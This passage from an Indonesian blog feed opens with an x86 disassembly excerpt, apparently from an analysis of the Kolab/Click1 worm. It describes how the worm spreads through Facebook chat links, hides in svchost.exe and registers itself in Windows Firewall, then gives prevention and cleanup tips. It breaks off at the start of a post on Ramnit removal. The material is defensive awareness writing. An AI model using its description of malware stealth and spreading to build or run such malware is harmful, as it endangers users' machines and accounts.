/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416E84&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184E0],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416EA8&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184E4],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;neg&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,[004183D4]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp,ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;eax,ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jz&amp;nbsp;&amp;nbsp;&amp;nbsp;0040184F&lt;br /&gt;&lt;br /&gt;l004017E4:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184DC],ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jz&amp;nbsp;&amp;nbsp;&amp;nbsp;0040184F&lt;br /&gt;&lt;br /&gt;l004017EC:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184E0],ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jz&amp;nbsp;&amp;nbsp;&amp;nbsp;0040184F&lt;br /&gt;&lt;br /&gt;l004017F4:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,al&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;movzx&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,word ptr [esp+14]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00000118&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,64&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jnz&amp;nbsp;&amp;nbsp;&amp;nbsp;00401813&lt;br /&gt;&lt;br /&gt;l0040180E:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;shl&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,02&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jmp&amp;nbsp;&amp;nbsp;&amp;nbsp;00401852&lt;br /&gt;&lt;br /&gt;l00401813:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;add&amp;nbsp;&amp;nbsp;&amp;nbsp;bx,cx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184E0]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edi,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;bl,07&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;edi,ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jnz&amp;nbsp;&amp;nbsp;&amp;nbsp;0040182B&lt;br /&gt;&lt;br /&gt;l00401827:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jmp&amp;nbsp;&amp;nbsp;&amp;nbsp;00401852&lt;br /&gt;&lt;br /&gt;l0040182B:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;cx,ax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184DC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184F8],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;inc&amp;nbsp;&amp;nbsp;&amp;nbsp;bl&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184E4]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004184FC],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;and&amp;nbsp;&amp;nbsp;&amp;nbsp;ecx,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;al,01&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jmp&amp;nbsp;&amp;nbsp;&amp;nbsp;00401854&lt;br /&gt;&lt;br /&gt;l0040184F:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ror&amp;nbsp;&amp;nbsp;&amp;nbsp;al,1D&lt;br /&gt;&lt;br /&gt;l00401852:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;xor&amp;nbsp;&amp;nbsp;&amp;nbsp;al,al&lt;br /&gt;&lt;br /&gt;l00401854:&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;pop&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret&lt;br /&gt;&lt;br /&gt;fn00401859()&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,[004184E8]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp,[004184EC]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416CB0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00413018]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;esi,[00413014]&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;edi,eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416ECC&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416EF0&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417A88],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;00416F14&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;edi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [004183C0],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;call&amp;nbsp;&amp;nbsp;&amp;nbsp;esi&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;test&amp;nbsp;&amp;nbsp;&amp;nbsp;ebx,ebx&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;dword ptr [00417DAC],eax&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;ebp&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;jz&amp;nbsp;&amp;nbsp;&amp;nbsp;004018B6&lt;br /&gt;---------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;div align="JUSTIFY" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;Hebatnya, akun Facebook yang di                          infeksi oleh virus tidak mengalami perubahan                          sama sekali. Bahkan tidak ada pop up FB Chat                          yang terbuka. Yang dibutuhkan oleh virus ini                          hanyalah akun Facebook tersebut sedang login                          saja. Kemungkinan besar hal ini terjadi supaya                          korban virus tidak menyadari kalau komputernya                          telah terinfeksi oleh&lt;/span&gt;&lt;span lang="en-US"&gt;&lt;span style="font-style: normal;"&gt; Kolab/Click1 dan                            menyebarkan banyak sekali FB Chat ke                            kontak-kontak Facebooknya yang mengarahkan                            untuk mendownload virus ini.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;Jika Anda                        meng-klik link pada pesan chat tersebut, maka                        secara otomatis file akan terdownload ke dalam                        komputer Anda. Dan jika Anda menjalankan file                        tersebut, maka komputer Anda sudah pasti telah                        terinfeksi.&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;&lt;b&gt;Sulit dibasmi                              dan menyebabkan BSOD (Bumi Serpong Ooo                              Damai ??.. :p)&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Kolab/Click1&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt; tidak berjalan pada proses atau                          services Windows, sehingga sulit menemukan dan                          mematikan keberadaan worm/rootkit ini. Tetapi,                          worm ini justru mendompleng atau menumpang                          pada file svchost.exe milik Windows, sehingga                          Anda akan sulit mematikan-nya. Jika Anda                          memaksa mematikan file svchost.exe, komputer                          akan mengalami &lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;blue                            screen of death / BSOD&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt;. Termasuk jika Anda mencoba                          melakukan scan menggunakan tools tertentu                          seperti &lt;/span&gt;&lt;span lang="en-US"&gt;&lt;b&gt;GMER, &lt;/b&gt;&lt;/span&gt;&lt;span lang="en-US"&gt;tools yang biasa digunakan untuk                          mendeteksi rootkit. (lihat gambar 6)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="CENTER" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;img border="0" name="Picture 22" src="http://vaksin.com/2011/0911/kolab/Kolab_html_m519a972a.jpg" /&gt;&lt;/div&gt;&lt;div align="CENTER" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Gambar 6,                              Berusaha mematikan file svchost yang telah                              didompleng, akan muncul BSOD&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;&lt;b&gt;Broadcast ke                              IP-IP tertentu&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;Walaupun tidak berjalan pada                          proses atau services Windows, &lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Kolab/Click1&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt; memanfaatkan file svchost.exe                          Windows, untuk melakukan broadcast pada IP-IP                          tertentu. (lihat gambar 7)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="CENTER" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;img border="0" name="Picture 23" src="http://vaksin.com/2011/0911/kolab/Kolab_html_1c5662b1.jpg" /&gt;&lt;/div&gt;&lt;div align="CENTER" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Gambar 7,                              Aktivitas broadcast yang dilakukan oleh &lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Kolab/Click1&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;&lt;b&gt;Mencantumkan                              diri-nya pada Windows Firewall&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;Agar dapat berjalan bebas tanpa                          hambatan, &lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Kolab/Click1&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt; mendaftarkan programnya pada                          Windows Firewall, sehingga diperbolehkan untuk                          melakukan koneksi dan broadcast. (lihat gambar                          8)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="CENTER" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;img border="0" name="Picture 24" src="http://vaksin.com/2011/0911/kolab/Kolab_html_61afa6c8.jpg" /&gt;&lt;/div&gt;&lt;div align="CENTER" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Gambar 8,                              Aktivitas broadcast yang dilakukan oleh &lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;Kolab/Click1&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="CENTER" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="JUSTIFY" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="line-height: 115%; margin-bottom: 0in; margin-left: 0.5in;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;&lt;b&gt;Tips Hindari &lt;/b&gt;&lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;&lt;b&gt;Kolab/Click1&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;Berikut beberapa tips bagi Anda                        jika tidak ingin terinfeksi dan menjadi korban                        dari worm/rootkit ini&lt;/span&gt;&lt;/div&gt;&lt;ol&gt;&lt;li&gt;                      &lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;Hindari melakukan klik pada                              link yang dikirim pada Anda, baik melalui                              pesan chat FB atau status.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;                      &lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;Beritahukan pada teman Anda,                              bahwa komputer tersebut telah terinfeksi                              virus, dan segera lakukan update dan scan                              komputer dengan antivirus yang terupdate.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;                      &lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;Jangan melakukan &lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;copy&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt; link atau melakukan                              pemberitahuan disertai link tersebut,                              karena dengan begitu Anda justru ikut                              menyebarkan link yang mengandung virus                              tersebut.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;                      &lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif; font-size: small;"&gt;&lt;span lang="en-US"&gt;Jangan meninggalkan &lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;FB&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt; Anda dalam keadaan aktif/&lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;login&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt;, sebaiknya Anda &lt;/span&gt;&lt;span lang="en-US"&gt;&lt;i&gt;logout&lt;/i&gt;&lt;/span&gt;&lt;span lang="en-US"&gt; dahulu hingga Anda kembali.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;                      &lt;div align="JUSTIFY" lang="id-ID" style="line-height: 115%; margin-bottom: 0in;"&gt;&lt;span style="font-family: Calibri,sans-serif;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span lang="en-US"&gt;&lt;span style="font-size: small;"&gt;Gunakan Secure HTTP / HTTPS                              pada saat Login FB, hal ini agar FB Anda                              tidak mudah diakses oleh orang lain                              disekitar Anda&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;Apa yang harus dilakukan jika sudah terlajur terinfeksi?&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-size: small;"&gt;Apabila kita sudah terlanjur menjalankan file virusnya, sudah pasti komputer yang kita gunakan akan terinfeksi virus tersebut. Beberapa hal yang bisa kita lakukan sebagai langkah awal pertolongan pertama mungkin bisa melakukan beberapa langkah berikut:&lt;/span&gt;&lt;/div&gt;&lt;ol style="text-align: justify;"&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Tutup akun facebook ( dalam hal ini Logout dari akun facebook) untuk mencegah penyebaran lebih banyak ke teman-teman facebook kita.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Pastikan di Komputer anda terinstall &lt;span class="IL_AD" id="IL_AD3"&gt;program Antivirus&lt;/span&gt; (disarankan &lt;span class="IL_AD" id="IL_AD5"&gt;ativirus&lt;/span&gt; luar), dan lakukan update database ke versi paling terbaru.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Matikan koneksi internet, kemudian lakukan full sistem scan di komputer menggunakan Antivirus yang sudah terupdate tadi, jika ada beberapa file yang terdeteksi (biasanya &lt;strong&gt;W32/Kolab.xxx&lt;/strong&gt; atau&amp;nbsp;&lt;strong&gt;Trojan.Click1.xxxx&lt;/strong&gt;) kita bisa menghapusnya atau untuk keamanan kita bisa meng-karantina (quarentine) file yang dicurigai sebagai virus.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size: small;"&gt;Restart komputer. Untuk memastikan keadaan sistem komputer kita, bisa lakukan lagi full sistem scan setelah komputer di restart.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-size: small;"&gt;&lt;strong&gt;&lt;/strong&gt;Ini tidak menjamin komputer akan bebas 100% dari infeksi virus tersebut, semua tergantung kemampuan dari masing-masing antivirus yang digunakan&lt;strong&gt;. &lt;/strong&gt;Dari beberapa sumber mengatakan, w32/kolab yang menyebar melaui chat facebook ini merupakan varian terbaru dari worm kolab (worm jaringan) yang sudah lama menyebar. Jadi untuk saat ini masih sulit dibersihkan&lt;strong&gt;.&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-size: small;"&gt;Berikut ini saya sertakan hasil deteksi beberapa antivirus terhadap virus tersebut.&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;strong&gt;&lt;a href="http://www.atepsaepulloh.com/wp-content/uploads/2011/09/Virus-Chat-FBz.jpg" rel="nozoom"&gt;&lt;img alt="" class="aligncenter" height="933" src="http://www.atepsaepulloh.com/wp-content/uploads/2011/09/Virus-Chat-FBz.jpg" width="532" /&gt;&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt; &lt;input id="IL_RELATED_TAGS1" name="IL_RELATED_TAGS" type="hidden" value="1" /&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-4515352201641192156?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/4515352201641192156/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2011/10/virus-trojan-menyebar-via-chat-fb.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/4515352201641192156'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/4515352201641192156'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2011/10/virus-trojan-menyebar-via-chat-fb.html' title='VIRUS TROJAN MENYEBAR VIA CHAT FB'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-JFNME930qTc/TopWyp1TrYI/AAAAAAAAAK8/QjnrIHmf4jk/s72-c/virus+via+FB.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-8833230848718146633</id><published>2011-07-23T02:37:00.001+07:00</published><updated>2011-07-23T02:39:41.745+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BASMI VIRUS'/><title type='text'>MEMBERANTAS VIRUS RAMNIT</title><content type='html'>&lt;p&gt;Memang Virus Ramnit adalah Virus yang sangat cepat penularannya , tetapi bagaimanapun hebatnya sesuatu pasti ada kelemahannya…. &lt;img src="http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif?m=1304062156g" alt=":)" class="wp-smiley" /&gt; &lt;/p&gt; &lt;p&gt;Disini saya akan menjelaskan dengan tuntas bagaimana Virus ramnit bekerja… sekaligus cara mengatasinya…&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Virus Ramnit.. :&lt;/strong&gt;&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Virus yang menginjeksi file .html , .exe dan .dll&lt;/li&gt;&lt;li&gt;Virus yang menular melalui removable disk ( UFD ) dengan cara  mengcopy file .cpl dan .exe yang selalu bertambah dan berubah-ubah  namanya.Yang tepatnya file tersebut berada di dalam folder Recycler… dan  4 file shortcut copy of yang akan menjalankan file *.cpl infektor yang  terdapat di folder 